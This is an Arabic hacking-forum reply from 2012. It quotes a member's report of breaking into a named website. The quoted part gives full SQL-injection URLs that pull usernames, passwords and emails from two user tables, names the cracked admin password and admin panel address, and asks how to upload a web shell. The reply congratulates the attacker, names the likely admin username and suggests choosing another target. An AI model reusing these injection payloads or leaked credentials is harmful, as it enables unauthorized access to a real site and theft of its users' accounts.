عرض مشاركة واحدة
قديم 01-16-2012, 01:17 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
x-men
 
الصورة الرمزية x-men
 

 

 
إحصائية العضو





x-men غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
x-men is on a distinguished road

افتراضي رد: مساعدة ياشباب مع أول استهداف لى


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة __MiM0__
:show off:
تم تجربة حقن احد المواقع الاخرى الموجودة على السيرفر وتم استخراج اليوزر والباسورد
وتم الدخول على الادمن الخاصة بالموقع بالموقع
كود PHP:
http://chiirichtown.com/album.php?id=-36 union /*!select*/ 1,2,/*!concat(US_Id,0x3a,US_Loginname,0x3a,US_Password,0x3a,US_Email)*/,4,5,6,7+from+tbl_users-- 
ملحوظة الباسورد بعد فك التشفيرة هو :: password
http://chiirichtown.com/admin

ويوجد جدول اخر

كود PHP:
http://chiirichtown.com/album.php?id=-36 union /*!select*/ 1,2,/*!concat(l_id,0x3a,LoginName,0x3a,Password,0x3a,Email)*/,4,5,6,7+from+tbl_login-- 
وجربت اليوزر ادمن وادمن على السى بنل ولكن لم ينفع
ممكن ياشباب حد يقولى ينفع ارفع شل على السيرفر من لوحة الادمن ام لا ؟؟ وان كانت الاجابة اه ممكن شرح او درس للطريقة
والف شكرا مقدما

اخي العزيز اول شي مبروك بس الموقع امراتي يعني عربي

وبرمجه خاصه لو تبقى تحاول الى الصباح لا تستطيع عمل شي لانه لا يسمح برفع ملف غير صوره والصوره ما تستطيع تستعرضه لو رفعتها
بالنسبه

لليوزر فهو :siegend اسم الشركه الي عامله السكربت وعلى ما اعتقد استضافه كمان
الباسورد:password أضعف باسورد

تحياتي لك نصيحه لك شوف موقع ثاني يعني ليس الاختراق غايه انما انت حققت اكثر من اختراق وحقنت الموقع يعني لو اخترقتو ما تستفيد شي ( الا اذا كان مراهنه او عداوه)
التوقيع

انا حاضر لاي أستفسار

xmen910@yahoo.com

 

   

رد مع اقتباس